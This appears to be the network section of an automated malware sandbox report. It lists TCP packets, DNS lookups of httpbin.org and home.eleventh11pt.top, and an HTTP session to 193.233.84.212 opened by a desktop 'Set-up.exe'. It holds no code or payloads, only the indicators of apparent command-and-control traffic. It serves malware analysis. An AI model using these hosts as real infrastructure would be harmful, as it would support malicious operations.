Dec 29, 2024 16:51:04.383569956 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.383590937 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.383691072 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383698940 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383734941 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.383742094 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383744955 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.383749008 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383794069 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.383871078 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383881092 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383919954 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.383944035 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383985996 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.384008884 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384016991 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384047985 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384059906 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.384104013 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.384131908 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384140015 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384171963 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.384202003 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384243011 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384299994 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384340048 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384407997 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384418964 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384526968 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384538889 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384721994 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384731054 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384792089 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384840965 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384897947 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.384907007 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385010004 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385016918 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385027885 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385063887 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385103941 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385153055 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385204077 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385211945 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385258913 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385270119 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385376930 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385385990 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385471106 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385478020 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.385514975 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.398930073 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.399195910 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.441149950 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.503768921 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.503844976 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.503854036 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.503951073 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.503958941 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.504007101 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.504055023 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.504353046 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.504440069 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.505253077 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505311012 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505460024 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505469084 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505508900 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505573034 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505583048 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505616903 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505739927 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505748987 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505856037 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505865097 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505875111 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505916119 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.505996943 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506009102 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506063938 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506130934 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506251097 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506259918 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506289959 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506347895 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506377935 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506465912 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506477118 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506494045 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506589890 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506598949 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506648064 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506656885 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506756067 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506763935 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506860971 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506870031 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506916046 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.506988049 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507050037 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507059097 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507196903 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507242918 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507273912 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507349968 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507359028 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507492065 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507502079 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507509947 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507555008 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507564068 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507577896 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507586002 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507653952 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507663965 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507673025 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.507761002 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.508033037 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.508096933 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.625489950 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625499964 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625505924 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625549078 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625633955 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625641108 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625677109 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625693083 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625808001 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625823975 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625861883 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625926971 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.625965118 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626013041 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626070023 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626151085 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626157999 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626166105 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626352072 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626368046 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626451015 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626533031 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626576900 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626591921 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626635075 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626702070 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626740932 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626832962 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626842022 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626909971 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626986027 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.626992941 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627002954 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627028942 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627120972 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627129078 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627212048 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627247095 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627346039 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627355099 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627392054 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627433062 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627489090 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627505064 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627574921 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627583027 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627650976 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627696037 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627751112 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627873898 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627885103 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627928972 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.627979994 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.628041029 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.628263950 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.628947020 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.628956079 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629075050 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629082918 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629115105 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629122019 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629175901 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629224062 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629271030 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629278898 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629334927 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629436970 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629451990 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629460096 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629586935 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629594088 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629627943 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629642010 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629770041 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629777908 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629837036 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629844904 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629954100 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.629961014 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630014896 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630022049 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630072117 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630156994 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630165100 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630199909 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630217075 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630295992 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630317926 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630381107 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630389929 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630456924 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630472898 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630551100 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630568027 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630677938 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630686045 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630718946 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630789995 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630845070 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630913973 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630953074 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.630960941 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.631036043 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.631043911 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.631124020 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.631135941 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.631263971 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.631272078 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.631278992 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749202967 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749219894 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749254942 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749269962 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749279976 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749365091 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749375105 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749433994 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749450922 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749494076 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749521017 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749538898 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749628067 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749635935 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749686956 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749702930 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749826908 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749869108 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749876022 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749878883 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749938965 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.749947071 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750011921 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750031948 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750083923 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750099897 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750138044 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750206947 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750258923 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750380993 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750396967 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750405073 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.750413895 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:09.486716986 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:09.486911058 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:09.487067938 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:09.487967968 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:09.608818054 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:09.781728029 CET	49732	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:09.902753115 CET	80	49732	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:09.902826071 CET	49732	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:09.906896114 CET	49732	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:10.027760983 CET	80	49732	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:11.498604059 CET	80	49732	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:11.498740911 CET	80	49732	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:11.498796940 CET	49732	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:11.499095917 CET	49732	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:11.619853973 CET	80	49732	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:11.646800041 CET	49733	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:11.767827034 CET	80	49733	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:11.767945051 CET	49733	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:11.771110058 CET	49733	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:11.891959906 CET	80	49733	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:13.545677900 CET	80	49733	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:13.545710087 CET	80	49733	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:13.545778990 CET	49733	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:13.545936108 CET	49733	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:13.666872978 CET	80	49733	193.233.84.212	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 16:50:58.657742023 CET	59009	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:50:58.657793045 CET	59009	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:50:58.798562050 CET	53	59009	1.1.1.1	192.168.2.4
Dec 29, 2024 16:50:58.949301004 CET	53	59009	1.1.1.1	192.168.2.4
Dec 29, 2024 16:51:02.032633066 CET	59012	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:51:02.032788038 CET	59012	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:51:02.887988091 CET	53	59012	1.1.1.1	192.168.2.4
Dec 29, 2024 16:51:02.888005018 CET	53	59012	1.1.1.1	192.168.2.4
Dec 29, 2024 16:51:09.574831009 CET	59014	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:51:09.574958086 CET	59014	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:51:09.723341942 CET	53	59014	1.1.1.1	192.168.2.4
Dec 29, 2024 16:51:09.723607063 CET	53	59014	1.1.1.1	192.168.2.4
Dec 29, 2024 16:51:11.505837917 CET	59016	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:51:11.505880117 CET	59016	53	192.168.2.4	1.1.1.1
Dec 29, 2024 16:51:11.646056890 CET	53	59016	1.1.1.1	192.168.2.4
Dec 29, 2024 16:51:11.646226883 CET	53	59016	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 16:50:58.657742023 CET	192.168.2.4	1.1.1.1	0xa744	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:50:58.657793045 CET	192.168.2.4	1.1.1.1	0x2537	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 29, 2024 16:51:02.032633066 CET	192.168.2.4	1.1.1.1	0xfe37	Standard query (0)	home.eleventh11pt.top	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:51:02.032788038 CET	192.168.2.4	1.1.1.1	0xf08d	Standard query (0)	home.eleventh11pt.top	28	IN (0x0001)	false
Dec 29, 2024 16:51:09.574831009 CET	192.168.2.4	1.1.1.1	0xa0cb	Standard query (0)	home.eleventh11pt.top	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:51:09.574958086 CET	192.168.2.4	1.1.1.1	0xad70	Standard query (0)	home.eleventh11pt.top	28	IN (0x0001)	false
Dec 29, 2024 16:51:11.505837917 CET	192.168.2.4	1.1.1.1	0xa976	Standard query (0)	home.eleventh11pt.top	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:51:11.505880117 CET	192.168.2.4	1.1.1.1	0x888e	Standard query (0)	home.eleventh11pt.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 16:50:58.949301004 CET	1.1.1.1	192.168.2.4	0xa744	No error (0)	httpbin.org	52.73.63.247	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:50:58.949301004 CET	1.1.1.1	192.168.2.4	0xa744	No error (0)	httpbin.org	54.173.142.217	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:51:02.888005018 CET	1.1.1.1	192.168.2.4	0xfe37	No error (0)	home.eleventh11pt.top	193.233.84.212	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:51:09.723341942 CET	1.1.1.1	192.168.2.4	0xa0cb	No error (0)	home.eleventh11pt.top	193.233.84.212	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:51:11.646226883 CET	1.1.1.1	192.168.2.4	0xa976	No error (0)	home.eleventh11pt.top	193.233.84.212	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.eleventh11pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	193.233.84.212	80	6880	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
